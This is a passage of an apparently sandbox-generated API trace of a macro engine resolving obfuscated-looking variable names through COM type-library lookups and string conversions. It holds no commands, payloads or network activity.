_Dst=0x144ec0) returned 0x0 [0069.122] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAoAAx", lHashVal=0x10d52c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a625be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAoAAx") returned 7 [0069.122] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAoAAx", lHashVal=0x10d52c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a625be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAoAAx") returned 7 [0069.122] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAoAAx", lHashVal=0x10d52c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.122] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAoAAx") returned 0x10d52c [0069.122] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tAoAAx" | out: _Dst="tAoAAx") returned 0x0 [0069.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tAoAAx") returned 7 [0069.123] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.123] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAoAAx", lHashVal=0x10d52c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.123] IUnknown:Release (This=0x665ba50) returned 0xd [0069.123] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.123] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAoAAx", lHashVal=0x10d52c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.123] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.123] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.123] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAoAAx", lHashVal=0x10d52c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.123] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.123] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.123] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAoAAx", lHashVal=0x10d52c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.123] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a625be, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAoAAx") returned 7 [0069.123] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAoAAx", lHashVal=0x10d52c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.123] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.123] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a625be | out: _Dst=0x67c2d40) returned 0x0 [0069.123] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAoAAx") returned 0x104f96 [0069.123] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tAoAAx" | out: _Dst="_B_var_tAoAAx") returned 0x0 [0069.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tAoAAx") returned 14 [0069.123] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.123] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAoAAx", lHashVal=0x104f96, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.123] IUnknown:Release (This=0x665ba50) returned 0xd [0069.123] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.123] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAoAAx", lHashVal=0x104f96, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.123] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.123] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.123] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tAoAAx", lHashVal=0x104f96, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.124] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.124] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.124] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAoAAx", lHashVal=0x104f96, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.124] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.124] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.124] IUnknown:Release (This=0x665ba50) returned 0xd [0069.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b112de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tAoAAx") returned 14 [0069.124] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAoAAx", lHashVal=0x104f96, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.124] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a625be | out: _Dst=0x144ec0) returned 0x0 [0069.124] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EAZkA_B", lHashVal=0x107fa8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62596, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAZkA_B") returned 8 [0069.124] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EAZkA_B", lHashVal=0x107fa8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62596, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAZkA_B") returned 8 [0069.124] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EAZkA_B", lHashVal=0x107fa8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.124] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAZkA_B") returned 0x107fa8 [0069.124] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="EAZkA_B" | out: _Dst="EAZkA_B") returned 0x0 [0069.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="EAZkA_B") returned 8 [0069.124] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.124] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EAZkA_B", lHashVal=0x107fa8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.124] IUnknown:Release (This=0x665ba50) returned 0xd [0069.124] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.125] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EAZkA_B", lHashVal=0x107fa8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.125] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.125] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.125] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EAZkA_B", lHashVal=0x107fa8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.125] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.125] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.125] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EAZkA_B", lHashVal=0x107fa8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.125] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62596, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAZkA_B") returned 8 [0069.125] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EAZkA_B", lHashVal=0x107fa8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.125] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.125] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62596 | out: _Dst=0x67c2d40) returned 0x0 [0069.125] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EAZkA_B") returned 0x10832c [0069.125] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_EAZkA_B" | out: _Dst="_B_var_EAZkA_B") returned 0x0 [0069.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_EAZkA_B") returned 15 [0069.125] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.125] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EAZkA_B", lHashVal=0x10832c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.125] IUnknown:Release (This=0x665ba50) returned 0xd [0069.125] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.125] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EAZkA_B", lHashVal=0x10832c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.125] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.125] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.125] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EAZkA_B", lHashVal=0x10832c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.125] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.125] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.125] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EAZkA_B", lHashVal=0x10832c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.125] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.126] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.126] IUnknown:Release (This=0x665ba50) returned 0xd [0069.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1130e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_EAZkA_B") returned 15 [0069.126] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EAZkA_B", lHashVal=0x10832c, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0) returned 0x0 [0069.126] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62596 | out: _Dst=0x144ec0) returned 0x0 [0069.126] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nAAAAA", lHashVal=0x107d70, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a625e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="nAAAAA") returned 7 [0069.126] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nAAAAA", lHashVal=0x107d70, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a625e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="nAAAAA") returned 7 [0069.126] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nAAAAA", lHashVal=0x107d70, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.127] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAAAAA") returned 0x107d70 [0069.127] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="nAAAAA" | out: _Dst="nAAAAA") returned 0x0 [0069.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="nAAAAA") returned 7 [0069.127] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.127] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nAAAAA", lHashVal=0x107d70, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.127] IUnknown:Release (This=0x665ba50) returned 0xd [0069.127] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.127] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nAAAAA", lHashVal=0x107d70, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.127] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.127] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.127] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nAAAAA", lHashVal=0x107d70, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.127] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.127] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.127] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nAAAAA", lHashVal=0x107d70, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.127] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a625e6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="nAAAAA") returned 7 [0069.127] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nAAAAA", lHashVal=0x107d70, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.127] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.127] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a625e6 | out: _Dst=0x67c2d40) returned 0x0 [0069.127] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nAAAAA") returned 0x10f819 [0069.127] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_nAAAAA" | out: _Dst="_B_var_nAAAAA") returned 0x0 [0069.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_nAAAAA") returned 14 [0069.127] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.127] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nAAAAA", lHashVal=0x10f819, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.127] IUnknown:Release (This=0x665ba50) returned 0xd [0069.127] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.128] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nAAAAA", lHashVal=0x10f819, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.128] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.128] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.128] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nAAAAA", lHashVal=0x10f819, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.128] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.128] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.128] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nAAAAA", lHashVal=0x10f819, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.128] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.128] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.128] IUnknown:Release (This=0x665ba50) returned 0xd [0069.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1133e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_nAAAAA") returned 14 [0069.128] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nAAAAA", lHashVal=0x10f819, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.128] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a625e6 | out: _Dst=0x144ec0) returned 0x0 [0069.128] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAkkAB", lHashVal=0x10f3d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6260e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAkkAB") returned 7 [0069.128] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAkkAB", lHashVal=0x10f3d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6260e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAkkAB") returned 7 [0069.128] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAkkAB", lHashVal=0x10f3d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAkkAB") returned 0x10f3d9 [0069.128] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tAkkAB" | out: _Dst="tAkkAB") returned 0x0 [0069.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tAkkAB") returned 7 [0069.129] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.129] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAkkAB", lHashVal=0x10f3d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.129] IUnknown:Release (This=0x665ba50) returned 0xd [0069.129] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.129] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAkkAB", lHashVal=0x10f3d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.129] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.129] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.129] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAkkAB", lHashVal=0x10f3d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.129] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.129] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.129] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAkkAB", lHashVal=0x10f3d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.129] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6260e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAkkAB") returned 7 [0069.129] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAkkAB", lHashVal=0x10f3d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.129] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.129] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6260e | out: _Dst=0x67c2d40) returned 0x0 [0069.129] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAkkAB") returned 0x106e43 [0069.129] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tAkkAB" | out: _Dst="_B_var_tAkkAB") returned 0x0 [0069.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tAkkAB") returned 14 [0069.129] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.129] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAkkAB", lHashVal=0x106e43, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.129] IUnknown:Release (This=0x665ba50) returned 0xd [0069.129] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.129] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAkkAB", lHashVal=0x106e43, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.129] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.129] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.130] ITypeLib:RemoteIsName (in: This=0x665bd20, 